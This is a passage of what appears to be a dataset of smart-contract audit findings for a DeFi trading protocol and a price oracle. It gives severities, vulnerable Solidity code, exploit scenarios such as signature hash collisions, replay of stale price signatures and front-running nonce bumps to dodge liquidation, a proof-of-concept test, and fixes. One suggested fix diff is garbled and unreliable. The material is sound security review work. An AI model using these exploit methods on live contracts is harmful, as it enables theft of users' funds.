IVUSD(registry.vusd());\\n marginAccount = IMarginAccount(registry.marginAccount());\\n insuranceFund = IInsuranceFund(registry.insuranceFund());\\n}\\n```\\n\\nWhen syncDeps is called the marginAccount and insuranceFund references are updated. All transactions require approvals to one of those two contract. Since no new approvals are made, the contract will become bricked and all transactions will revert.чRemove approvals to old contracts before changing and approve new contracts afterчContract will become bricked and all contracts that are integrated or depend on it will also be brickedч```\\nfunction syncDeps(address _registry) public onlyGovernance {\\n IRegistry registry = IRegistry(_registry);\\n vusd = IVUSD(registry.vusd());\\n marginAccount = IMarginAccount(registry.marginAccount());\\n insuranceFund = IInsuranceFund(registry.insuranceFund());\\n}\\n```\\n -No `minAnswer/maxAnswer` Circuit Breaker Checks while Querying Prices in Oracle.solчmediumчThe Oracle.sol contract, while currently applying a safety check (this can be side stepped, check my other submission ) to ensure returned prices are greater than zero, which is commendable, as it effectively mitigates the risk of using negative prices, there should be an implementation to ensure the returned prices are not at the extreme boundaries (minAnswer and maxAnswer). Without such a mechanism, the contract could operate based on incorrect prices, which could lead to an over- or under-representation of the asset's value, potentially causing significant harm to the protocol.\\nChainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. This is exactly what happened to Venus on BSC when LUNA imploded. In its current form, the `getUnderlyingPrice()` function within the Oracle.sol contract retrieves the latest round data from Chainlink, if the asset's market price plummets below `minAnswer` or skyrockets above `maxAnswer`, the returned price will still be `minAnswer` or `maxAnswer`, respectively, rather than the actual market price. This could potentially lead to an exploitation scenario where the protocol interacts with the asset using incorrect price information.\\nTake a look at Oracle.sol#L106-L123:\\n```\\n function getLatestRoundData(AggregatorV3Interface _aggregator)\\n internal\\n view\\n returns (\\n uint80,\\n uint256 finalPrice,\\n uint256\\n )\\n {\\n (uint80 round, int256 latestPrice, , uint256 latestTimestamp, ) = _aggregator.latestRoundData();\\n finalPrice = uint256(latestPrice);\\n if (latestPrice <= 0) {\\n requireEnoughHistory(round);\\n (round, finalPrice, latestTimestamp) = getRoundData(_aggregator, round - 1);\\n }\\n return (round, finalPrice, latestTimestamp);\\n }\\n```\\n\\nIllustration:\\nPresent price of TokenA is $10\\nTokenA has a minimum price set at $1 on chainlink\\nThe actual price of TokenA dips to $0.10\\nThe aggregator continues to report $1 as the price.\\nConsequently, users can interact with protocol using TokenA as though it were still valued at $1, which is a tenfold overestimate of its real market value.чSince there is going to be a whitelist of tokens to be added, the minPrice/maxPrice could be checked and a revert could be made when this is returned by chainlink or a fallback oracle that does not have circuit breakers could be implemented in that caseчThe potential for misuse arises when the actual price of an asset drastically changes but the oracle continues to operate using the `minAnswer` or `maxAnswer` as the asset's price. In the case of it going under the `minAnswer` malicious actors obviously have the upperhand and could give their potential going to zero worth tokens to protocolч```\\n function getLatestRoundData(AggregatorV3Interface _aggregator)\\n internal\\n view\\n returns (\\n uint80,\\n uint256 finalPrice,\\n uint256\\n )\\n {\\n (uint80 round, int256 latestPrice, , uint256 latestTimestamp, ) = _aggregator.latestRoundData();\\n finalPrice = uint256(latestPrice);\\n if (latestPrice <= 0) {\\n requireEnoughHistory(round);\\n (round, finalPrice, latestTimestamp) = getRoundData(_aggregator, round - 1);\\n }\\n return (round, finalPrice, latestTimestamp);\\n }\\n```\\n -setSymbolsPrice() can use the priceSig from a long time agoчhighч`setSymbolsPrice()` only restricts the maximum value of `priceSig.timestamp`, but not the minimum time This allows a malicious user to choose a malicious `priceSig` from a long time ago A malicious `priceSig.upnl` can seriously harm `partyB`\\n`setSymbolsPrice()` only restricts the maximum value of `priceSig.timestamp`, but not the minimum time\\n```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n \"LiquidationFacet: Expired signature\"\\n );\\n```\\n\\nLibMuon.verifyPrices only check sign, without check the time range\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, \"LibMuon: Invalid length\");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n\\nIn this case, a malicious user may pick any `priceSig` from a long time ago, and this `priceSig` may have a large negative `unpl`, leading to `LiquidationType.OVERDUE`, severely damaging `partyB`\\nWe need to restrict `priceSig.timestamp` to be no smaller than `maLayout.liquidationTimestamp[partyA]` to avoid this problemчrestrict `priceSig.timestamp` to be no smaller than `maLayout.liquidationTimestamp[partyA]`\\n```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(maLayout.liquidationStatus[partyA], \"LiquidationFacet: PartyA is solvent\");\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n \"LiquidationFacet: Expired signature\"\\n );\\n+ require(priceSig.timestamp >= maLayout.liquidationTimestamp[partyA],\"invald price timestamp\");\\n```\\nчMaliciously choosing the illegal `PriceSig` thus may hurt others userч```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n \"LiquidationFacet: Expired signature\"\\n );\\n```\\n -LibMuon Signature hash collisionчhighчIn `LibMuon` , all signatures do not distinguish between type prefixes, and `abi.encodePacked` is used when calculating the hash Cause when `abi.encodePacked`, if there is a dynamic array, different structures but the same hash value may be obtained Due to conflicting hash values, signatures can be substituted for each other, making malicious use of illegal signatures possible\\nThe following two methods are examples\\n1.verifyPrices:\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, \"LibMuon: Invalid length\");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n\\n2.verifyPartyAUpnlAndPrice\\n```\\n function verifyPartyAUpnlAndPrice(\\n SingleUpnlAndPriceSig memory upnlSig,\\n address partyA,\\n uint256 symbolId\\n ) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n// require(\\n// block.timestamp <= upnlSig.timestamp + muonLayout.upnlValidTime,\\n// \"LibMuon: Expired signature\"\\n// );\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n upnlSig.reqId,\\n address(this),\\n partyA,\\n AccountStorage.layout().partyANonces[partyA],\\n upnlSig.upnl,\\n symbolId,\\n upnlSig.price,\\n upnlSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, upnlSig.sigs, upnlSig.gatewaySignature);\\n }\\n```\\n\\nWe exclude the same common part (muonAppId/reqId/address (this)/timestamp/getChainId ())\\nThrough the following simplified test code, although the structure is different, the hash value is the same at that time\\n```\\n function test() external {\\n address verifyPrices_partyA = address(0x1);\\n int256 verifyPrices_upnl = 100;\\n int256 verifyPrices_totalUnrealizedLoss = 100;\\n uint256 [] memory verifyPrices_symbolIds = new uint256[](1);\\n verifyPrices_symbolIds[0]=1;\\n uint256 [] memory verifyPrices_prices = new uint256[](1);\\n verifyPrices_prices[0]=1000; \\n\\n bytes32 verifyPrices = keccak256(abi.encodePacked(\\n verifyPrices_partyA,\\n verifyPrices_upnl,\\n verifyPrices_totalUnrealizedLoss,\\n verifyPrices_symbolIds,\\n verifyPrices_prices\\n ));\\n\\n address verifyPartyAUpnlAndPrice_partyA = verifyPrices_partyA;\\n int256 verifyPartyAUpnlAndPrice_partyANonces = verifyPrices_upnl;\\n int256 verifyPartyAUpnlAndPrice_upnl = verifyPrices_totalUnrealizedLoss;\\n uint256 verifyPartyAUpnlAndPrice_symbolId = verifyPrices_symbolIds[0];\\n uint256 verifyPartyAUpnlAndPrice_price = verifyPrices_prices[0];\\n\\n\\n bytes32 verifyPartyAUpnlAndPrice = keccak256(abi.encodePacked(\\n verifyPartyAUpnlAndPrice_partyA,\\n verifyPartyAUpnlAndPrice_partyANonces,\\n verifyPartyAUpnlAndPrice_upnl,\\n verifyPartyAUpnlAndPrice_symbolId,\\n verifyPartyAUpnlAndPrice_price\\n ));\\n\\n console.log(\"verifyPrices == verifyPartyAUpnlAndPrice:\",verifyPrices == verifyPartyAUpnlAndPrice);\\n\\n }\\n```\\n\\n```\\n$ forge test -vvv\\n\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] test() (gas: 4991)\\nLogs:\\n verifyPrices == verifyPartyAUpnlAndPrice: true\\n\\nTest result: ok. 1 passed; 0 failed; finished in 11.27ms\\n```\\n\\nFrom the above test example, we can see that the `verifyPrices` and `verifyPartyAUpnlAndPrice` signatures can be used interchangeably If we get a legal `verifyPartyAUpnlAndPrice` , it can be used as the signature of `verifyPrices ()` Use `partyANonces` as `upnl`, etcчIt is recommended to add the prefix of the hash, or use `api.encode` Such as:\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, \"LibMuon: Invalid length\");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n+ \"verifyPrices\",\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\nчSignatures can be reused due to hash collisions, through illegal signatures, using illegal `unpl`, etcч```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, \"LibMuon: Invalid length\");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n -`depositAndAllocateForPartyB` is broken due to incorrect precisionчhighчDue to incorrect precision, any users or external protocols utilizing the `depositAndAllocateForPartyB` to allocate 1000 USDC will end up only having 0.000000001 USDC allocated to their account. This might potentially lead to unexpected loss of funds due to the broken functionality if they rely on the accuracy of the function outcome to perform certain actions that deal with funds/assets.\\nThe input `amount` of the `depositForPartyB` function must be in native precision (e.g. USDC should be 6 decimals) as the function will automatically scale the `amount` to 18 precision in Lines 114-115 below.\\n```\\nFile: AccountFacetImpl.sol\\n function depositForPartyB(uint256 amount) internal {\\n IERC20(GlobalAppStorage.layout().collateral).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountStorage.layout().balances[msg.sender] += amountWith18Decimals;\\n }\\n```\\n\\nOn the other hand, the input `amount` of `allocateForPartyB` function must be in 18 decimals precision. Within the protocol, it uses 18 decimals for internal accounting.\\n```\\nFile: AccountFacetImpl.sol\\n function allocateForPartyB(uint256 amount, address partyA, bool increaseNonce) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n require(accountLayout.balances[msg.sender] >= amount, \"PartyBFacet: Insufficient balance\");\\n require(\\n !MAStorage.layout().partyBLiquidationStatus[msg.sender][partyA],\\n \"PartyBFacet: PartyB isn't solvent\"\\n );\\n if (increaseNonce) {\\n accountLayout.partyBNonces[msg.sender][partyA] += 1;\\n }\\n accountLayout.balances[msg.sender] -= amount;\\n accountLayout.partyBAllocatedBalances[msg.sender][partyA] += amount;\\n }\\n```\\n\\nThe `depositAndAllocateForPartyB` function allows the users to deposit and allocate to their accounts within a single transaction. Within the function, it calls the `depositForPartyB` function followed by the `allocateForPartyB` function. The function passes the same `amount` into both the `depositForPartyB` and `allocateForPartyB` functions. However, the problem is that one accepts `amount` in native precision (e.g. 6 decimals) while the other accepts `amount` in scaled decimals (e.g. 18 decimals).\\nAssume that Alice calls the `depositAndAllocateForPartyB` function and intends to deposit and allocate 1000 USDC. Thus, she set the `amount` of the `depositAndAllocateForPartyB` function to `1000e6` as the precision of USDC is `6`.\\nThe `depositForPartyB` function at Line 78 will work as intended because it will automatically be scaled up to internal accounting precision (18 decimals) within the function, and 1000 USDC will be deposited to her account.\\nThe `allocateForPartyB` at Line 79 will not work as intended. The function expects the `amount` to be in internal accounting precision (18 decimals), but an `amount` in native precision (6 decimals for USDC) is passed in. As a result, only 0.000000001 USDC will be allocated to her account.\\n```\\nFile: AccountFacet.sol\\n function depositAndAllocateForPartyB(\\n uint256 amount,\\n address partyA\\n ) external whenNotPartyBActionsPaused onlyPartyB {\\n AccountFacetImpl.depositForPartyB(amount);\\n AccountFacetImpl.allocateForPartyB(amount, partyA, true);\\n emit DepositForPartyB(msg.sender, amount);\\n emit AllocateForPartyB(msg.sender, partyA, amount);\\n }\\n```\\nчScale the `amount` to internal accounting precision (18 decimals) before passing it to the `allocateForPartyB` function.\\n```\\nfunction depositAndAllocateForPartyB(\\n uint256 amount,\\n address partyA\\n) external whenNotPartyBActionsPaused onlyPartyB {\\n AccountFacetImpl.depositForPartyB(amount);\\n// Add the line below\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n// Add the line below\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n// Remove the line below\\n AccountFacetImpl.allocateForPartyB(amount, partyA, true);\\n// Add the line below\\n AccountFacetImpl.allocateForPartyB(amountWith18Decimals, partyA, true);\\n emit DepositForPartyB(msg.sender, amount);\\n emit AllocateForPartyB(msg.sender, partyA, amount);\\n}\\n```\\nчAny users or external protocols utilizing the `depositAndAllocateForPartyB` to allocate 1000 USDC will end up only having 0.000000001 USDC allocated to their account, which might potentially lead to unexpected loss of funds due to the broken functionality if they rely on the accuracy of the outcome to perform certain actions dealing with funds/assets.\\nFor instance, Bob's account is close to being liquidated. Thus, he might call the `depositAndAllocateForPartyB` function in an attempt to increase its allocated balance and improve its account health level to avoid being liquidated. However, the `depositAndAllocateForPartyB` is not working as expected, and its allocated balance only increased by a very small amount (e.g. 0.000000001 USDC in our example). Bob believed that his account was healthy, but in reality, his account was still in danger as it only increased by 0.000000001 USDC. In the next one or two blocks, the price swung, and Bob's account was liquidated.ч```\\nFile: AccountFacetImpl.sol\\n function depositForPartyB(uint256 amount) internal {\\n IERC20(GlobalAppStorage.layout().collateral).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountStorage.layout().balances[msg.sender] += amountWith18Decimals;\\n }\\n```\\n -Accounting error in PartyB's pending locked balance led to loss of fundsчhighчAccounting error in the PartyB's pending locked balance during the partial filling of a position could lead to a loss of assets for PartyB.\\n```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n..SNIP..\\n quoteLayout.quoteIdsOf[quote.partyA].push(currentId);\\n..SNIP..\\n } else {\\n accountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n filledLockedValues\\n );\\n }\\n```\\n\\nParameter Description\\n$quote_{current}$ Current quote (Quote ID = 1)\\n$quote_{new}$ Newly created quote (Quote ID = 2) due to partially filling\\n$lockedValue_{total}$ 100 USD. The locked values of $quote_{current}$\\n$lockedValue_{filled}$ 30 USD. $lockedValue_{filled} = lockedValue_{total}\\times\\frac{filledAmount}{quote.quantity}$\\n$lockedValue_{unfilled}$ 70 USD. $lockedValue_{unfilled} = lockedValue_{total}-lockedValue_{filled}$\\n$pendingLockedBalance_{a}$ 100 USD. PartyA's pending locked balance\\n$pendingLockedBalance_{b}$ 100 USD. PartyB's pending locked balance\\n$pendingQuotes_a$ PartyA's pending quotes. $pendingQuotes_a = [quote_{current}]$\\n$pendingQuotes_b$ PartyB's pending quotes. $pendingQuotes_b = [quote_{current}]$\\nAssume the following states before the execution of the `openPosition` function:\\n$pendingQuotes_a = [quote_{current}]$\\n$pendingQuotes_b = [quote_{current}]$\\n$pendingLockedBalance_{a} = 100\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nWhen the `openPosition` function is executed, $quote_{current}$ will be removed from $pendingQuotes_a$ and $pendingQuotes_b$ in Line 156.\\nIf the position is partially filled, $quote_{current}$ will be filled, and $quote_{new}$ will be created with the unfilled amount ($lockedValue_{unfilled}$). The $quote_{new}$ is automatically added to PartyA's pending quote list in Line 225.\\nThe states at this point are as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 100\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nLine 238 removes the balance already filled ($lockedValue_{filled}$) from $pendingLockedBalance_{a}$ . The unfilled balance ($lockedValue_{unfilled}$) does not need to be removed from $pendingLockedBalance_{a}$ because it is now the balance of $quote_{new}$ that belong to PartyA. The value in $pendingLockedBalance_a$ is correct.\\nThe states at this point are as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 70\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nIn Line 239, the code removes the balance already filled ($lockedValue_{filled}$) from $pendingLockedBalance_{b}$\\nThe end state is as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 70\\ USD$\\n$pendingLockedBalance_{b} = 70\\ USD$\\nAs shown above, the value of $pendingLockedBalance_{b}$ is incorrect. Even though PartyB has no pending quote, 70 USD is still locked in the pending balance.\\nThere are three (3) important points to note:\\n$quote_{current}$ has already been removed from $pendingQuotes_b$ in Line 156\\n$quote_{new}$ is not automatically added to $pendingQuotes_b$. When $quote_{new}$ is created, it is not automatically locked to PartyB.\\n$pendingQuotes_b$ is empty\\nAs such, $lockedValue_{total}$ should be removed from the $pendingLockedBalance_{b}$ instead of only $lockedvalue_{filled}$.чUpdate the affected function to remove $lockedValue_{total}$ from the $pendingLockedBalance_{b}$ instead of only $lockedvalue_{filled}$.\\n```\\naccountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\naccountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n// Remove the line below\\n filledLockedValues\\n// Add the line below\\n quote.lockedValues\\n);\\n```\\nчEvery time PartyB partially fill a position, their $pendingLockedBalance_b$ will silently increase and become inflated. The pending locked balance plays a key role in the protocol's accounting system. Thus, an error in the accounting breaks many of the computations and invariants of the protocol.\\nFor instance, it is used to compute the available balance of an account in `partyBAvailableForQuote` function. Assuming that the allocated balance remains the same. If the pending locked balance increases silently due to the bug, the available balance returned from the `partyBAvailableForQuote` function will decrease. Eventually, it will \"consume\" all the allocated balance, and there will be no available funds left for PartyB to open new positions or to deallocate+withdraw funds. Thus, leading to lost of assets for PartyB.ч```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n..SNIP..\\n quoteLayout.quoteIdsOf[quote.partyA].push(currentId);\\n..SNIP..\\n } else {\\n accountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n filledLockedValues\\n );\\n }\\n```\\n -Liquidation can be blocked by incrementing the nonceчhighчMalicious users could block liquidators from liquidating their accounts, which creates unfairness in the system and lead to a loss of profits to the counterparty.\\nInstance 1 - Blocking liquidation of PartyA\\nA liquidatable PartyA can block liquidators from liquidating its account.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyA(address partyA, SingleUpnlSig memory upnlSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n\\n LibMuon.verifyPartyAUpnl(upnlSig, partyA);\\n int256 availableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnl,\\n partyA\\n );\\n require(availableBalance < 0, \"LiquidationFacet: PartyA is solvent\");\\n maLayout.liquidationStatus[partyA] = true;\\n maLayout.liquidationTimestamp[partyA] = upnlSig.timestamp;\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n }\\n```\\n\\nWithin the `liquidatePartyA` function, it calls the `LibMuon.verifyPartyAUpnl` function.\\n```\\nFile: LibMuon.sol\\n function verifyPartyAUpnl(SingleUpnlSig memory upnlSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n// require(\\n// block.timestamp <= upnlSig.timestamp + muonLayout.upnlValidTime,\\n// \"LibMuon: Expired signature\"\\n// );\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n upnlSig.reqId,\\n address(this),\\n partyA,\\n AccountStorage.layout().partyANonces[partyA],\\n upnlSig.upnl,\\n upnlSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, upnlSig.sigs, upnlSig.gatewaySignature);\\n }\\n```\\n\\nThe `verifyPartyAUpnl` function will take the current nonce of PartyA (AccountStorage.layout().partyANonces[partyA]) to build the hash needed for verification.\\nWhen the PartyA becomes liquidatable or near to becoming liquidatable, it could start to monitor the mempool for any transaction that attempts to liquidate their accounts. Whenever a liquidator submits a `liquidatePartyA` transaction to liquidate their accounts, they could front-run it and submit a transaction to increment their nonce. When the liquidator's transaction is executed, the on-chain PartyA's nonce will differ from the nonce in the signature, and the liquidation transaction will revert.\\nFor those chains that do not have a public mempool, they can possibly choose to submit a transaction that increments their nonce in every block as long as it is economically feasible to obtain the same result.\\nGas fees that PartyA spent might be cheap compared to the number of assets they will lose if their account is liquidated. Additionally, gas fees are cheap on L2 or side-chain (The protocol intended to support Arbitrum One, Arbitrum Nova, Fantom, Optimism, BNB chain, Polygon, Avalanche as per the contest details).\\nThere are a number of methods for PartyA to increment their nonce, this includes but not limited to the following:\\nAllocate or deallocate dust amount\\nLock and unlock the dummy position\\nCalls `requestToClosePosition` followed by `requestToCancelCloseRequest` immediately\\nInstance 2 - Blocking liquidation of PartyB\\nThe same exploit can be used to block the liquidation of PartyB since the `liquidatePartyB` function also relies on the `LibMuon.verifyPartyBUpnl,` which uses the on-chain nonce of PartyB for signature verification.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n LibMuon.verifyPartyBUpnl(upnlSig, partyB, partyA);\\n```\\nчIn most protocols, whether an account is liquidatable is determined on-chain, and this issue will not surface. However, the architecture of Symmetrical protocol relies on off-chain and on-chain components to determine if an account is liquidatable, which can introduce a number of race conditions such as the one mentioned in this report.\\nConsider reviewing the impact of malicious users attempting to increment the nonce in order to block certain actions in the protocols since most functions rely on the fact that the on-chain nonce must be in sync with the signature's nonce and update the architecture/contracts of the protocol accordingly.чPartyA can block their accounts from being liquidated by liquidators. With the ability to liquidate the insolvent PartyA, the unrealized profits of all PartyBs cannot be realized, and thus they will not be able to withdraw the profits.\\nPartyA could also exploit this issue to block their account from being liquidated to:\\nWait for their positions to recover to reduce their losses\\nBuy time to obtain funds from elsewhere to inject into their accounts to bring the account back to a healthy level\\nSince this is a zero-sum game, the above-mentioned create unfairness to PartyB and reduce their profits.\\nThe impact is the same for the blocking of PartyB liquidation.ч```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyA(address partyA, SingleUpnlSig memory upnlSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n\\n LibMuon.verifyPartyAUpnl(upnlSig, partyA);\\n int256 availableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnl,\\n partyA\\n );\\n require(availableBalance < 0, \"LiquidationFacet: PartyA is solvent\");\\n maLayout.liquidationStatus[partyA] = true;\\n maLayout.liquidationTimestamp[partyA] = upnlSig.timestamp;\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n }\\n```\\n -Liquidation of PartyA will fail due to underflow errorsчhighчLiquidation of PartyA will fail due to underflow errors. As a result, assets will be stuck, and there will be a loss of assets for the counterparty (the creditor) since they cannot receive the liquidated assets.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePositionsPartyA(\\n address partyA,\\n uint256[] memory quoteIds\\n ) internal returns (bool) {\\n..SNIP..\\n (bool hasMadeProfit, uint256 amount) = LibQuote.getValueOfQuoteForPartyA(\\n accountLayout.symbolsPrices[partyA][quote.symbolId].price,\\n LibQuote.quoteOpenAmount(quote),\\n quote\\n );\\n..SNIP..\\n if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NORMAL\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += quote\\n .lockedValues\\n .cva;\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.LATE\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * accountLayout.liquidationDetails[partyA].deficit) /\\n accountLayout.lockedBalances[partyA].cva);\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.OVERDUE\\n ) {\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n amount -\\n ((amount * accountLayout.liquidationDetails[partyA].deficit) /\\n uint256(-accountLayout.liquidationDetails[partyA].totalUnrealizedLoss));\\n }\\n }\\n```\\n\\nAssume that at this point, the allocated balance of PartyB (accountLayout.partyBAllocatedBalances[quote.partyB][partyA]) only has 1000 USD.\\nIn Line 152 above, the `getValueOfQuoteForPartyA` function is called to compute the PnL of a position. Assume the position has a huge profit of 3000 USD due to a sudden spike in price. For this particular position, PartyA will profit 3000 USD while PartyB will lose 3000 USD.\\nIn this case, 3000 USD needs to be deducted from PartyB's account. However, when the `accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;` code at Line 170, 182, or 190 gets executed, an underflow error will occur, and the transaction will revert. This is because `partyBAllocatedBalances` is an unsigned integer, and PartyB only has 1000 USD of allocated balance, but the code attempts to deduct 3000 USD.чConsider implementing the following fixes to ensure that the amount to be deducted will never exceed the allocated balance of PartyB to prevent underflow errors from occurring.\\n```\\nif (hasMadeProfit) {\\n// Add the line below\\n amountToDeduct = amount > accountLayout.partyBAllocatedBalances[quote.partyB][partyA] ? accountLayout.partyBAllocatedBalances[quote.partyB][partyA] : amount\\n// Add the line below\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Remove the line below\\n= amountToDeduct\\n// Remove the line below\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Remove the line below\\n= amount;\\n} else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Add the line below\\n= amount;\\n}\\n```\\nчLiquidation of PartyA will fail. Since liquidation cannot be completed, the assets that are liable to be liquidated cannot be transferred from PartyA (the debtor) to the counterparty (the creditor). Assets will be stuck, and there will be a loss of assets for the counterparty (the creditor) since they cannot receive the liquidated assets.ч```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePositionsPartyA(\\n address partyA,\\n uint256[] memory quoteIds\\n ) internal returns (bool) {\\n..SNIP..\\n (bool hasMadeProfit, uint256 amount) = LibQuote.getValueOfQuoteForPartyA(\\n 